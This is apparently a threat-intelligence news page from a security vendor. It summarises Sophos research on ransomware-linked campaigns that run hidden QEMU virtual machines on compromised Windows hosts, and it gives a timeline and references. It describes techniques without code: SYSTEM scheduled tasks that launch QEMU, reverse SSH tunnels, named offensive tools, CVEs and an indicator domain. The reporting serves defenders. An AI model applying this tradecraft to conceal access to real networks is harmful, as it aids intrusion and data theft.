Threat actors are increasingly abusing QEMU to launch hidden virtual machines on compromised Windows hosts, allowing credential theft, reconnaissance, command-and-control, data staging, and ransomware preparation to occur outside the visibility of many endpoint security tools. Sophos linked one campaign, STAC4713, to GOLD ENCOUNTER and the PayoutsKing ransomware operation, where attackers gained access through exposed SonicWall VPNs without MFA and exploitation of SolarWinds Web Help Desk CVE-2025-26399, then created a SYSTEM-level scheduled task such as TPMProfiler to start qemu-system-x86_64.exe, boot a disguised Alpine Linux virtual disk, and establish reverse SSH tunnels for covert access. Researchers said the hidden VM hosted tooling including AdaptixC2, Chisel, Rclone, and wg-obfuscator, enabling stealthy persistence and exfiltration while leaving limited forensic evidence on the host.
A second campaign, STAC3725, exploited CitrixBleed2 CVE-2025-5777, installed a malicious ScreenConnect client, created a rogue local administrator account, and used a QEMU-based VM to assemble offensive tooling such as Impacket, BloodHound.py, Kerbrute, KrbRelayX, NetExec, and Metasploit for post-compromise operations. Reporting also noted broader initial-access methods, including phishing and fake Microsoft Teams IT-support lures, and warned that adversaries may shift between QEMU and other virtualization or sideloading techniques while keeping the same objective of stealthy intrusion and ransomware enablement. Defenders were urged to hunt for unauthorized QEMU installations, suspicious SYSTEM scheduled tasks, unusual SSH tunneling or port forwarding, disguised virtual disk images, and related indicators including the domain vtps.us, while prioritizing MFA and patching for CVE-2025-26399 and CVE-2025-5777.

Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
4 events from the most recent confirmed update back to the earliest known activity.
On April 22, 2026, Gurucul published a high-severity threat notice on QEMU abuse as a living-off-the-land technique. The notice included indicators of compromise such as the domain vtps.us, IP addresses, file hashes, and detection queries tied to the reported activity.
On April 16, 2026, Sophos published research describing a growing trend of threat actors abusing QEMU to run hidden virtual machines on compromised hosts. The report detailed the STAC4713 and STAC3725 campaigns, their tooling, access methods, and detection recommendations.
Sophos reported that the STAC3725 campaign was first seen in February 2026. The campaign used CitrixBleed2 (CVE-2025-5777) for initial access, deployed a malicious ScreenConnect client, and used a QEMU VM to build and run attacker tooling.
Sophos said the STAC4713 campaign was first observed in November 2025. The activity was linked to the PayoutsKing ransomware operation and involved using QEMU-based hidden virtual machines for stealthy post-compromise operations.
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
5 references tracked. Mallory keeps watching after this page renders.
community.gurucul.com
Open sourcescworld.com
Open sourcecybersecuritynews.com
Open sourcesecurityaffairs.com
Open sourcesophos.com
Open sourceMap indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.